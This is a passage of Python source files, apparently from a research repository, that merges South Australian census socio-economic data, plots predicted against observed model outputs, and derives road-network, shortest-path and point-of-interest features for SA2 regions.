perc_indig_age_35_64':'perc_indig_age_35_64',\n ' perc_indig_age_15plus_edu_degree_diploma_certificate':'perc_indig_age_15plus_edu_degree_diploma_certificate',\n ' perc_indig_hsld_equiv_inc_1000_1500':'perc_indig_hsld_equiv_inc_1000_1500',\n ' perc_indig_1_or_more_vehicle_in_hsld':'perc_indig_1_or_more_vehicle_in_hsld',\n ' perc_indig_hsld_equiv_inc_above_1500':'perc_indig_hsld_equiv_inc_above_1500',\n ' perc_indig_hsld_equiv_inc_300_1000':'perc_indig_hsld_equiv_inc_300_1000',\n ' sa2_code16':'sa2_code16',\n ' perc_indig_m':'perc_indig_m',\n ' perc_indig_age_15_34':'perc_indig_age_15_34',\n ' perc_indig_age_15plus_edu_none':'perc_indig_age_15plus_edu_none'}\n\nindigenous_social_df.rename(columns=rename_dic,inplace=True)\n\nindigenous_social_df['sa2_code16']=indigenous_social_df['sa2_code16'].astype('str')\n\n# print(indigenous_social_df.shape)\n#endregion\n\n\n#region 5. Other socio economic variables\necon_df = pd.read_csv(raw_data_path+'social_econ_indicators.csv')\nunemployment_rate_df = pd.read_csv(raw_data_path+'data_unemployment_rate.csv')\n\n#\nrename_dic = {'pov_rt_exc_hc_syn':'poverty_rate_1',\n ' housestrs_syn': 'hh_finance_stress',\n ' equivinc_median_syn':'equivinc_median_syn',\n ' pov_rt_syn':'poverty_rate_2',\n ' inc_median_syn':'median_inc',\n ' gini_syn':'gini',\n ' sa2_code16': 'sa2_code16'}\necon_df.rename(columns=rename_dic,inplace=True)\necon_df['sa2_code16']=econ_df['sa2_code16'].astype('str')\n\n\n#\nrename_dic = {'unemployment_rate':'unemployment_rate',\n ' sa2_code16': 'sa2_code16'}\nunemployment_rate_df.rename(columns=rename_dic,inplace=True)\nunemployment_rate_df['sa2_code16']=unemployment_rate_df['sa2_code16'].astype('str')\n\n#endregion\n\n\n\n\n#region 6. merge all socio-economic variables\n# jobs_all, jobs_industries, age_df, gender_educ_df, all_educ_df, indigenous_social_df\n# print(jobs_all.columns) # sa2_code16\n# print(jobs_all.shape)\n# print(jobs_industries.columns) # sa2_code16\n# print(jobs_industries.shape)\n# print(age_df.columns) # sa2_main16\n# print(age_df.shape)\n# print(gender_educ_df.columns) # SA2_MAIN16\n# print(gender_educ_df.shape)\n# print(all_educ_df.columns) # sa2_main16\n# print(all_educ_df.shape)\n# print(indigenous_social_df.columns) # sa2_code16\n# print(indigenous_social_df.shape)\n\nsocio_econ_df = jobs_all.merge(jobs_industries, on='sa2_code16', suffixes=(\"\",\"_y\"))\nsocio_econ_df = socio_econ_df.merge(age_df, left_on='sa2_code16', right_on='sa2_main16')\nsocio_econ_df = socio_econ_df.merge(gender_educ_df, left_on='sa2_code16', right_on='SA2_MAIN16')\nsocio_econ_df = socio_econ_df.merge(all_educ_df, left_on='sa2_code16', right_on='sa2_main16')\nsocio_econ_df = socio_econ_df.merge(indigenous_social_df, on='sa2_code16', suffixes=(\"\",\"_z\"))\nsocio_econ_df = socio_econ_df.merge(econ_df, on='sa2_code16', suffixes=(\"\",\"_drop\"))\nsocio_econ_df = socio_econ_df.merge(unemployment_rate_df, on='sa2_code16', suffixes=(\"\",\"_drop\"))\n\nprint(socio_econ_df.shape)\nprint(socio_econ_df.columns)\n#endregion\n\n\n# save files\nsocio_econ_df.to_pickle(intermediate_data_path+'sa2_node_with_socio_econ_df.pickle') # Pycharm code\n# socio_econ_df.to_pickle('../data/socio_econ_df.pickle') # command line code.\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.627790629863739,
"alphanum_fraction": 0.6339492201805115,
"avg_line_length": 40.870967864990234,
"blob_id": "d29da0cf998ef7d80c0ed4595aa2ad40cb18e45e",
"content_id": "a7c0ca8444d433ecc87202704ee63cddcbda2ef8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2598,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 62,
"path": "/src/d06_visualization/visualize_pred_real.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# evaluate the models by plotting real vs. predicted values\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\n\n###########################################################################################\n# Visualize predicted vs. real outputs\n###########################################################################################\n# format: saved model name: (picture title, figure name, dataframe).\nmodel_list_to_read_dic = {'model1_list_od_duration': ('Travel time (origin to destination)', 'pred_travel_time', edge_flow_df),\n 'model2_list_consumption_amount_mcc_source': ('Amount of consumption', 'pred_consumption_amount', edge_consumption_df),\n 'model2_list_consumption_count_mcc_source': ('Counts of consumption', 'pred_consumption_count', edge_consumption_df),\n 'model2_list_flow_agents': ('Flow of people', 'pred_flow', edge_flow_df),\n 'model3_list_median_income_per_job_aud_persons': ('Median income', 'pred_inc', node_df)\n }\n\nfor model_pickle_name in model_list_to_read_dic.keys():\n with open(model_path + model_pickle_name + '.pickle', 'rb') as f:\n model_list = pickle.load(f)\n\n # get picture title, fig_name, and dataframe\n picture_title, fig_name, df = model_list_to_read_dic[model_pickle_name]\n\n # obtain y_name, x_name, and saved model\n _, (y_name, x_name), model = model_list[-1]\n\n # plot the observed vs. predicted values.\n util.plot_observed_predicted(df, y_name, x_name, model, report_path+'model_visual_pred_actual/', picture_title, fig_name)\n\n\n"
},
{
"alpha_fraction": 0.5538636445999146,
"alphanum_fraction": 0.5767381191253662,
"avg_line_length": 42.97503662109375,
"blob_id": "f50e49bae37087aa4148089c453cd614c9061431",
"content_id": "66443b1b121f081c660400b1a7ffeb1503d0d5e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29946,
"license_type": "permissive",
"max_line_length": 213,
"num_lines": 681,
"path": "/notebooks/jason/shp_process.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport geoplot\nfrom pysal.lib import weights\nimport networkx as nx\nfrom scipy.spatial import distance\nimport momepy\nimport pickle\nimport math\nimport sys\n\ndef shortest_path(shp_file):\n \"\"\"\n Inputs:\n shp_file - a shp file\n Outputs:\n A dictionary that maps (o,d) pairs to its shortest path\n \"\"\"\n \n print(\"=====Running shortest_path=====\")\n \n #convert to austrailia projection\n shp_file_proj = shp_file.to_crs(\"epsg:3112\")\n # Step 1. Queen net\n shp_file_queen = weights.contiguity.Queen.from_dataframe(shp_file)\n \n # Step 2. Kernel net with the right euclidean weighting\n #Use all K nearest neighbors\n shp_file_kernel = weights.distance.Kernel.from_dataframe(shp_file_proj, k = shp_file_queen.n - 1)\n # turn the defaults to euclidean distances as weights.\n for i in shp_file_kernel.neighbors.keys():\n for j_idx in range(len(shp_file_kernel.neighbors[i])):\n j = shp_file_kernel.neighbors[i][j_idx]\n # note that kw.weights indices are \n # i (node index), j_idx (index of the node on the list - not node index!)\n weight = shp_file_kernel.weights[i][j_idx]\n distance = (1 - weight)*shp_file_kernel.bandwidth[i]\n shp_file_kernel.weights[i][j_idx] = distance[0]\n \n # Step 3. assign euclidean weights to Queen net\n for o in shp_file_queen.neighbors.keys():\n for d_idx in range(len(shp_file_queen.neighbors[o])):\n d = shp_file_queen.neighbors[o][d_idx] # return the o and d SA2 original indices. \n weight = shp_file_kernel[o][d] # get the kernel weight associated with the o and d.\n shp_file_queen.weights[o][d_idx] = weight\n \n \n # create the queen network in nx\n shp_file_nx = shp_file_queen.to_networkx()\n\n # assign weights to adelaide_nx\n for o,d in shp_file_nx.edges:\n shp_file_nx.edges[o,d]['weight'] = shp_file_queen[o][d]\n\n # example weight between nodes 0 and 1.\n shp_file_nx.get_edge_data(0, 1)\n \n # full paths.\n # return: (node, (distance, path))\n path=dict(nx.all_pairs_dijkstra(shp_file_nx, weight='weight'))\n \n # create a OD dictionary.\n OD_full_path = {}\n\n for o in range(110):\n for d in range(110):\n if d==103 or o==103: # note that 103 is the island - this is no path to it.\n pass\n else:\n OD_full_path[(o,d)] = path[o][1][d]\n \n print(\"=====DONE shortest_path=====\") \n \n return OD_full_path\n\ndef process_road_shp(road_file):\n \"\"\"\n Input: road_file -- for example: gpd.read_file(mount_path + \"/SA data/dataSA/roads/Roads_GDA2020.shp\")\n \n Output: cleaned road.shp file\n \n \"\"\"\n sa2_roads = road_file.loc[~road_file['class'].isna(),]\n \n return sa2_roads\n\ndef union_road_land_shp(shp, road_shp):\n \"\"\"\n Inputs:\n shp - a shp file\n road_shp - the shp file containing road information\n Outputs:\n A shp file with all the information merged\n \"\"\"\n \n print(\"=====Running union_road_land_shp=====\")\n \n # crs and projection\n shp_proj = shp.to_crs(\"epsg:3112\")\n sa2_roads_proj = road_shp.to_crs(\"epsg:3112\")\n\n \n # create the centroids for roads\n road_centroid = sa2_roads_proj.centroid\n \n # attach SA2 idx to road networks\n sa2_roads_proj['SA2_loc'] = -1 # init as -1.\n\n for SA2_idx in range(shp_proj.shape[0]):\n # assign SA2_idx to the road network\n within_logic = road_centroid.within(shp_proj.loc[SA2_idx, 'geometry'])\n sa2_roads_proj.loc[within_logic, 'SA2_loc'] = SA2_idx\n \n # Use only the 'class' variable for now. \n sa2_roads_class_proj = sa2_roads_proj[['class', 'geometry', 'SA2_loc']]\n sa2_roads_class_proj_dummies = pd.get_dummies(sa2_roads_class_proj)\n \n \n # aggregate the road attribute dummies for SA2.\n sa2_roads_class_proj_dummies = sa2_roads_class_proj_dummies.loc[sa2_roads_class_proj_dummies['SA2_loc'] > -1]\n sa2_road_class_agg=sa2_roads_class_proj_dummies.groupby(by='SA2_loc').sum()\n \n # augment road class variables to SA2_network.\n shp_proj = shp_proj.merge(sa2_road_class_agg, how='inner', left_index=True, right_index=True)\n \n print(\"=====DONE union_road_land_shp=====\")\n \n return shp_proj, sa2_roads_proj\n\ndef get_degree_df(shp_proj, road_proj):\n \"\"\"\n Inputs:\n shp_proj - a shp projection merged with road info; the first output union_road_land_shp(shp, road_shp)\n road_proj - a shp projection that has only road information; the second output of union_road_land_shp(shp, road_shp)\n Outputs:\n degree_df - a df with SA2 code and its degree counts\n node_degree_df - a pickle file with the shp file information + node degree counts\n edge_degree_df - a pickle file with the shp file information + agg node degree counts of the shortest path\n \"\"\"\n \n print(\"=====Running get_degree_df=====\")\n \n \n #get counts\n count ={}\n for elt in road_proj[\"SA2_loc\"]:\n if elt in count:\n count[elt] += 1\n else:\n count[elt] = 1\n SA_idxs = sorted((key,count[key]) for key in count)\n \n \n sa_idx_to_graph = {}\n for sa_idx,c in SA_idxs[1:]:\n within = road_proj[road_proj[\"SA2_loc\"]==sa_idx]\n graph = momepy.gdf_to_nx(within, approach='primal')\n sa_idx_to_graph[sa_idx] = graph\n \n \n degree_df = pd.DataFrame(columns=[\"SA2_MAIN16\", \"num_nodes\", \n \"num_1degree\", \"num_2degree\", \n \"num_3degree\", \"num_4degree\", \n \"num_greater5degree\"])\n \n for sa_idx in sa_idx_to_graph:\n g = sa_idx_to_graph[sa_idx]\n degree = dict(nx.degree(g))\n nx.set_node_attributes(g, degree, 'degree')\n g = momepy.node_degree(g, name='degree')\n node_df, edge_df, sw = momepy.nx_to_gdf(g, points=True, lines=True,\n spatial_weights=True)\n\n SA2_MAIN16 = shp_proj.iloc[sa_idx][\"SA2_MAIN16\"]\n #nodes is intersections\n num_nodes = len(node_df)\n #num_0degree = len(node_df[node_df[\"degree\"]==0])\n num_1degree = len(node_df[node_df[\"degree\"]==1])\n num_2degree = len(node_df[node_df[\"degree\"]==2])\n num_3degree = len(node_df[node_df[\"degree\"]==3])\n num_4degree = len(node_df[node_df[\"degree\"]==4])\n num_greater5degree = len(node_df[node_df[\"degree\"]>=5])\n degree_df = degree_df.append({\"SA2_MAIN16\": SA2_MAIN16, \"num_nodes\":num_nodes, \n \"num_1degree\":num_1degree, \"num_2degree\":num_2degree, \"num_3degree\":num_3degree,\n \"num_4degree\":num_4degree,\n \"num_greater5degree\":num_greater5degree},\n ignore_index=True)\n \n print(\"=====DONE degree df=====\")\n \n return degree_df\n\ndef get_specific_df(OD_full_path, shp, shp_proj, mount_path, sa4_set=['401','402','403','404']):\n \"\"\"\n Inputs:\n OD_full_path - output from shortest_path(); the first output union_road_land_shp(shp, road_shp)\n shp - original shp file\n shp_proj - the shp file merged with road attributes \n \n Outputs:\n edge_specific_df - initial edge df with all info\n node_specific_df - intial node df with all info\n \"\"\"\n \n print(\"=====Running get_specific_df=====\")\n \n # read google api info\n with open(mount_path + '/SA data/dataSA/OD_Google_API_raw.pickle', 'rb') as w:\n OD_google_raw = pickle.load(w)\n\n with open(mount_path + '/SA data/dataSA/OD_Google_API_With_Map_Info.pickle', 'rb') as w:\n OD_google_with_map = pickle.load(w)\n \n jobs_all_sub = jobs_all[['num_jobs_000_persons', 'sa2_code16', 'median_income_per_job_aud_persons']]\n \n flow_adelaide_df = flow_df.loc[np.array([x[:3] in sa4_set for x in flow_df.agent_home_sa2])]\n flow_adelaide_df = flow_adelaide_df.loc[np.array([x[:3] in sa4_set for x in flow_adelaide_df.sa2])]\n \n flow_adelaide_df.rename(columns={'agent_home_sa2':'origin','sa2':'destination'}, inplace=True)\n flow_adelaide_df['OD'] = ''\n flow_adelaide_df['OD'] = flow_adelaide_df['origin'] + flow_adelaide_df['destination']\n flow_adelaide_df.groupby(by='OD').sum() # no repetition. \n \n # reindex\n flow_adelaide_df.index = np.arange(flow_adelaide_df.shape[0])\n \n # create ten columns here.\n road_attribute_names_list = ['class_ART', 'class_BUS', 'class_COLL',\n 'class_FREE', 'class_HWY', 'class_LOCL', 'class_SUBA', 'class_TRK2',\n 'class_TRK4', 'class_UND']\n flow_adelaide_df[road_attribute_names_list] = 0.0\n \n \n # add the road attributes on the shortest path to the flow_adelaide_df.\n # time cost: 3-5 mins?\n for idx in np.arange(flow_adelaide_df.shape[0]):\n origin = flow_adelaide_df.loc[idx, 'origin']\n destination = flow_adelaide_df.loc[idx, 'destination']\n o_idx = shp.index[shp.SA2_MAIN16==origin].tolist()[0]\n d_idx = shp.index[shp.SA2_MAIN16==destination].tolist()[0]\n #print(o_idx,d_idx)\n\n try:\n # OD_full_path might not have all the shortest path...\n idx_list_on_shortest_path = OD_full_path[(o_idx, d_idx)]\n for node_on_shortest_path in idx_list_on_shortest_path:\n flow_adelaide_df.loc[idx, road_attribute_names_list] += shp_proj.loc[node_on_shortest_path, road_attribute_names_list] \n except KeyError as error:\n pass\n \n \n # add the job information to flow dataframe.\n # origin\n flow_adelaide_df=flow_adelaide_df.merge(jobs_all_sub, left_on='origin', right_on='sa2_code16', how = 'left')\n flow_adelaide_df=flow_adelaide_df.rename(columns={'num_jobs_000_persons':'num_jobs_000_persons_origin', 'median_income_per_job_aud_persons':'median_income_per_job_aud_origin'})\n\n # destination\n flow_adelaide_df=flow_adelaide_df.merge(jobs_all_sub, left_on='destination', right_on='sa2_code16', how = 'left')\n flow_adelaide_df=flow_adelaide_df.rename(columns={'num_jobs_000_persons':'num_jobs_000_persons_destination', 'median_income_per_job_aud_persons':'median_income_per_job_aud_destination'})\n\n \n # augment the travel time and distance information to flow_adelaide_df\n flow_adelaide_df['od_duration_value']=0.0 \n flow_adelaide_df['od_distance_value']=0.0 \n\n for idx in range(flow_adelaide_df.shape[0]):\n if idx%100 == 0:\n print(idx)\n\n # idx is the index in flow_adelaide_df\n origin_sa2_idx = flow_adelaide_df.loc[idx,'origin']\n destination_sa2_idx = flow_adelaide_df.loc[idx,'destination']\n\n # return the corresponding idx from OD_Google_API\n filter_idx = np.multiply(OD_google_with_map.loc[:, 'o_sa2_idx'] == origin_sa2_idx,\n OD_google_with_map.loc[:, 'd_sa2_idx'] == destination_sa2_idx)\n idx_google_api = OD_google_with_map.index[filter_idx].tolist()[0] # this is the index in OD_google_with_map\n\n # \n flow_adelaide_df.loc[idx, 'od_duration_value'] = OD_google_with_map.loc[idx_google_api, 'od_duration_value']\n flow_adelaide_df.loc[idx, 'od_distance_value'] = OD_google_with_map.loc[idx_google_api, 'od_distance_value']\n \n # replace 0.0 values by 1.0\n cols = ['sum_stay_duration','unique_agents','total_stays',\n 'class_ART', 'class_BUS', 'class_COLL', 'class_FREE', 'class_HWY', 'class_LOCL', \n 'class_SUBA', 'class_TRK2', 'class_TRK4', 'class_UND',\n 'od_duration_value', 'od_distance_value']\n\n for col in cols:\n flow_adelaide_df.loc[flow_adelaide_df.loc[:,col] == 0.0, col] = 1.0\n \n # dropped 433 observations. The df has nan.\n flow_adelaide_df.dropna(how = 'any', inplace = True)\n \n # add total road count as a variable\n flow_adelaide_df['road_counts'] = np.sum(flow_adelaide_df[['class_ART', 'class_BUS', 'class_COLL', 'class_FREE', 'class_HWY', 'class_LOCL', \n 'class_SUBA', 'class_TRK2', 'class_TRK4', 'class_UND']], axis = 1)\n edge_specific_df = flow_adelaide_df.copy()\n \n print(\"=====DONE EDGE=====\")\n \n # origin and destination flow counts\n origin_flow_counts = flow_adelaide_df.groupby(by=\"origin\",as_index=False,sort=False).sum()[['origin','unique_agents','sum_stay_duration','total_stays']]\n destination_flow_counts = flow_adelaide_df.groupby(by=\"destination\",as_index=False,sort=False).sum()[['destination','unique_agents','sum_stay_duration','total_stays']]\n \n # compute origin and destination entropy (w.r.t. location). flow location diversity.\n # origin\n origin_flow_count_n = flow_adelaide_df.groupby('origin')[['unique_agents','sum_stay_duration','total_stays']].transform('sum')\n values = flow_adelaide_df[['unique_agents','sum_stay_duration','total_stays']]/origin_flow_count_n\n flow_adelaide_df[['unique_agents_origin_entropy','sum_stay_duration_origin_entropy','total_stays_origin_entropy']] = \\\n -(values*np.log(values))\n origin_flow_entropy=flow_adelaide_df.groupby('origin',as_index=False,sort=False)[['unique_agents_origin_entropy','sum_stay_duration_origin_entropy','total_stays_origin_entropy']].sum()\n\n # destination\n destination_flow_count_n = flow_adelaide_df.groupby('destination')[['unique_agents','sum_stay_duration','total_stays']].transform('sum')\n values = flow_adelaide_df[['unique_agents','sum_stay_duration','total_stays']]/destination_flow_count_n\n flow_adelaide_df[['unique_agents_destination_entropy','sum_stay_duration_destination_entropy','total_stays_destination_entropy']] = \\\n -(values*np.log(values))\n destination_flow_entropy=flow_adelaide_df.groupby('destination',as_index=False,sort=False)[['unique_agents_destination_entropy','sum_stay_duration_destination_entropy','total_stays_destination_entropy']].sum()\n\n # merge data to sa2_adelaide_road_proj\n # augment income and jobs\n sa2_data_prep=pd.merge(shp_proj, jobs_all_sub, left_on='SA2_MAIN16', right_on='sa2_code16', how = 'inner')\n sa2_data_prep=pd.merge(sa2_data_prep, origin_flow_counts, left_on='SA2_MAIN16', right_on='origin', how='inner', suffixes=[None,'_origin_counts'])\n sa2_data_prep=pd.merge(sa2_data_prep, destination_flow_counts, left_on='SA2_MAIN16', right_on='destination', how='inner', suffixes=[None,'_destination_counts'])\n sa2_data_prep=pd.merge(sa2_data_prep, origin_flow_entropy, left_on='SA2_MAIN16', right_on='origin', how='inner')\n sa2_data_prep=pd.merge(sa2_data_prep, destination_flow_entropy, left_on='SA2_MAIN16', right_on='destination', how='inner')\n\n # rename the '_origin_counts'\n sa2_data_prep = sa2_data_prep.rename(columns={'unique_agents':'unique_agents_origin_counts',\n 'sum_stay_duration':'sum_stay_duration_origin_counts',\n 'total_stays':'total_stays_origin_counts'})\n \n node_specific_df = sa2_data_prep.copy()\n \n print(\"=====DONE get_specific_df=====\")\n \n return edge_specific_df, node_specific_df\n\ndef union_degree(node_df, edge_df, degree_df, OD_full_path):\n \"\"\"\n Inputs:\n node_df, edge_df - the node and edge specific df from get_specific_df\n OD_full_path - output of shortest_path\n degree_df - output of get degree df\n Outputs:\n edge_degree_df, node_degree_df - respective dfs merged with degree df\n \"\"\"\n \n print(\"=====Running union_degree=====\")\n \n node_degree_df = node_df.merge(degree_df, how=\"left\", on=\"SA2_MAIN16\")\n \n origin_dest = list(zip(edge_df[\"origin\"].values, edge_df[\"destination\"].values))\n \n edge_degree_df = pd.DataFrame(columns=[\"sa2_code16_x\", \"sa2_code16_y\", \"num_nodes_x\", \n \"num_1degree_x\", \"num_2degree_x\", \"num_3degree_x\", \"num_4degree_x\",\n \"num_greater5degree_x\",\n \"num_nodes_y\", \n \"num_1degree_y\", \"num_2degree_y\", \"num_3degree_y\", \"num_4degree_y\",\n \"num_greater5degree_y\"])\n \n sa_to_i = {}\n i_to_sa = {}\n sa_to_data = {}\n for i, row in degree_df.iterrows():\n print(i)\n i_to_sa[i] = row[\"SA2_MAIN16\"]\n sa_to_i[row[\"SA2_MAIN16\"]] = i\n sa_to_data[row[\"SA2_MAIN16\"]] = row[['num_nodes', 'num_1degree','num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']]\n \n for o,d in origin_dest:\n if o != d:\n o_data = degree_df[degree_df[\"SA2_MAIN16\"]==o]\n d_data = degree_df[degree_df[\"SA2_MAIN16\"]==d]\n\n num_nodes_pth = 0\n num_1degree_pth = 0\n num_2degree_pth = 0\n num_3degree_pth = 0\n num_4degree_pth = 0\n num_greater5degree_pth = 0\n oid = sa_to_i[o]\n did = sa_to_i[d]\n for i in OD_full_path[(oid,did)]:\n sa = i_to_sa[i]\n num_nodes_pth += float(sa_to_data[sa][0])\n num_1degree_pth += float(sa_to_data[sa][1])\n num_2degree_pth += float(sa_to_data[sa][2])\n num_3degree_pth += float(sa_to_data[sa][3])\n num_4degree_pth += float(sa_to_data[sa][4])\n num_greater5degree_pth += float(sa_to_data[sa][5])\n\n\n\n num_nodes_x = float(o_data[\"num_nodes\"].iloc[0])\n num_1degree_x = float(o_data[\"num_1degree\"].iloc[0])\n num_2degree_x = float(o_data[\"num_2degree\"].iloc[0])\n num_3degree_x = float(o_data[\"num_3degree\"].iloc[0])\n num_4degree_x = float(o_data[\"num_4degree\"].iloc[0])\n num_greater5degree_x = float(o_data[\"num_greater5degree\"].iloc[0])\n\n num_nodes_y = float(d_data[\"num_nodes\"].iloc[0])\n num_1degree_y = float(d_data[\"num_1degree\"].iloc[0])\n num_2degree_y = float(d_data[\"num_2degree\"].iloc[0])\n num_3degree_y = float(d_data[\"num_3degree\"].iloc[0])\n num_4degree_y = float(d_data[\"num_4degree\"].iloc[0])\n num_greater5degree_y = float(d_data[\"num_greater5degree\"].iloc[0])\n\n\n else:\n o_data = degree_df[degree_df[\"SA2_MAIN16\"]==o]\n d_data = degree_df[degree_df[\"SA2_MAIN16\"]==d]\n num_nodes_x = num_nodes_y = num_nodes_pth = float(o_data[\"num_nodes\"].iloc[0])\n num_1degree_x = num_1degree_y = num_1degree_pth = float(o_data[\"num_1degree\"].iloc[0])\n num_2degree_x = num_2degree_y = num_2degree_pth = float(o_data[\"num_2degree\"].iloc[0])\n num_3degree_x = num_3degree_y = num_3degree_pth = float(o_data[\"num_3degree\"].iloc[0])\n num_4degree_x = num_4degree_y = num_4degree_pth = float(o_data[\"num_4degree\"].iloc[0])\n num_greater5degree_x = num_greater5degree_y = num_greater5degree_pth = float(o_data[\"num_greater5degree\"].iloc[0])\n\n edge_degree_df = edge_degree_df.append({\"sa2_code16_x\": o, \"sa2_code16_y\":d ,\"num_nodes_x\":num_nodes_x, \n \"num_1degree_x\":num_1degree_x, \"num_2degree_x\":num_2degree_x, \n \"num_3degree_x\":num_3degree_x, \"num_4degree_x\":num_4degree_x,\n \"num_greater5degree_x\":num_greater5degree_x,\n \"num_nodes_y\":num_nodes_y, \n \"num_1degree_y\":num_1degree_y, \"num_2degree_y\":num_2degree_y, \n \"num_3degree_y\":num_3degree_y, \"num_4degree_y\":num_4degree_y,\n \"num_greater5degree_y\":num_greater5degree_y,\n \"num_nodes_pth\":num_nodes_pth,\n \"num_1degree_pth\":num_1degree_pth,\n \"num_2degree_pth\":num_2degree_pth,\n \"num_3degree_pth\":num_3degree_pth,\n \"num_4degree_pth\":num_4degree_pth,\n \"num_greater5degree_pth\":num_greater5degree_pth },\n ignore_index=True)\n edge_degree_df = edge_df.merge(edge_degree_df, how=\"left\", on=[\"sa2_code16_x\",\"sa2_code16_y\"])\n \n print(\"=====DONE union_degree=====\")\n \n return edge_degree_df, node_degree_df\n\ndef union_poi(node_degree_df, edge_degree_df):\n \"\"\"\n Inputs:\n node_degree_df, edge_degree_df - outputs of union degree\n Outputs:\n Inputs merged with poi df\n \"\"\"\n \n print(\"=====Running union_poi=====\")\n \n \n# poi_df = pd.read_pickle(\"../../data_process/poi_df.pickle\")\n# sa_codes_poi = []\n# for i, centroid in enumerate(poi_df.geometry):\n# if i%100 == 0: print(i)\n# found = False\n# for i, row in sa2_south_au.iterrows():\n# if row[\"geometry\"].contains(centroid):\n# sa_codes_poi.append(row[\"SA2_MAIN16\"])\n# found = True\n# break\n# if not found:\n# sa_codes_poi.append(\"0\")\n# poi_df[\"SA2_MAIN16\"] = sa_codes_poi\n# poi_df.to_pickle(\"../../data_process/poi_df_cleaned.pickle\")\n poi_df = pd.read_pickle(\"../../data_process/poi_df_cleaned.pickle\")\n poi_df = poi_df[poi_df[\"SA2_MAIN16\"]!=\"0\"]\n \n \n count = poi_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])\n split_count = poi_df.groupby([\"SA2_MAIN16\",\"type\"],as_index=False).aggregate([\"count\"])\n \n poi_df = pd.DataFrame()\n \n poi_df[\"SA2_MAIN16\"] = count.index.values\n poi_df[\"poi_count\"] = count[( 'geometry', 'count')].values\n \n entropy = {}\n for i, row in split_count.iterrows():\n sa_id, _type = i\n total_count = poi_df.loc[poi_df[\"SA2_MAIN16\"]==sa_id][\"poi_count\"]\n val = row[( 'geometry', 'count')]/total_count\n\n if sa_id not in entropy:\n entropy[sa_id] = (-val * np.log(val))\n else:\n entropy[sa_id] += (-val * np.log(val))\n \n entropy_list = []\n for sa_id in poi_df.SA2_MAIN16:\n entropy_list.append(float(entropy[sa_id]))\n \n poi_df[\"poi_count_entropy\"] = entropy_list\n \n node_degree_entropy_df = node_degree_df.merge(poi_df,how=\"left\",on=\"SA2_MAIN16\")\n \n sa_ids_poi = set(poi_df[\"SA2_MAIN16\"].values)\n \n edge_degree_df = edge_degree_df[edge_degree_df[\"sa2_code16_y\"].isin(sa_ids_poi)]\n edge_degree_df = edge_degree_df[edge_degree_df[\"sa2_code16_x\"].isin(sa_ids_poi)]\n \n count_dic = {key:val for key,val in zip(poi_df[\"SA2_MAIN16\"].values, poi_df[\"poi_count\"].values)}\n \n entropy_x = []\n poi_count_x = []\n notin = 0\n for sa_id in edge_degree_df[\"sa2_code16_x\"].values:\n if sa_id in entropy:\n entropy_x.append(float(entropy[sa_id]))\n poi_count_x.append(float(count_dic[sa_id]))\n else:\n notin += 1\n notin=0\n entropy_y = []\n poi_count_y = []\n for sa_id in edge_degree_df[\"sa2_code16_y\"]:\n if sa_id in entropy:\n entropy_y.append(float(entropy[sa_id]))\n poi_count_y.append(float(count_dic[sa_id]))\n else:\n notin += 1\n \n edge_degree_df[\"poi_entropy_x\"] = entropy_x\n edge_degree_df[\"poi_entropy_y\"] = entropy_y\n \n edge_degree_df[\"poi_count_x\"] = poi_count_x\n edge_degree_df[\"poi_count_y\"] = poi_count_y\n \n print(\"=====DONE union_poi=====\")\n \n return edge_degree_df, node_degree_entropy_df\n\ndef union_social(node_degree_poi_df, mount_path):\n \"\"\"\n Input:\n node_degree_poi_df - output from union_poi\n Output:\n A merged df with input and social economic info\n \"\"\"\n \n print(\"=====Running union_social=====\")\n \n age_df = pd.read_csv(mount_path + \"SA data/data_age.csv\")\n gender_educ_df = pd.read_csv(mount_path + \"SA data/data_gender_educ.csv\")\n \n \n age_df = age_df[[' sa2_main16','p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs',' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',' p_tot_55_64_yrs', ' p_tot_tot']]\n \n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs',' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',' p_tot_55_64_yrs']:\n age_df[col] = age_df[col] / age_df[\" p_tot_tot\"]\n \n gender_educ_df[\" gender_tot_tot\"] = gender_educ_df[\" m_tot_tot\"] + gender_educ_df[\" f_tot_tot\"]\n \n for col in ['m_tot_75_84_yr', ' m_adv_dip_dip_total', ' m_tot_35_44_yr',\n ' m_tot_55_64_yr', ' f_b_deg_tot', ' m_tot_85_yr_over',\n ' f_tot_55_64_yr', ' f_cer_tot_tot', ' f_tot_65_74_yr',\n ' f_tot_15_24_yr', ' m_grad_dip_cer_tot', \n ' f_tot_75_84_yr', ' f_tot_45_54_yr', ' m_tot_45_54_yr',\n ' 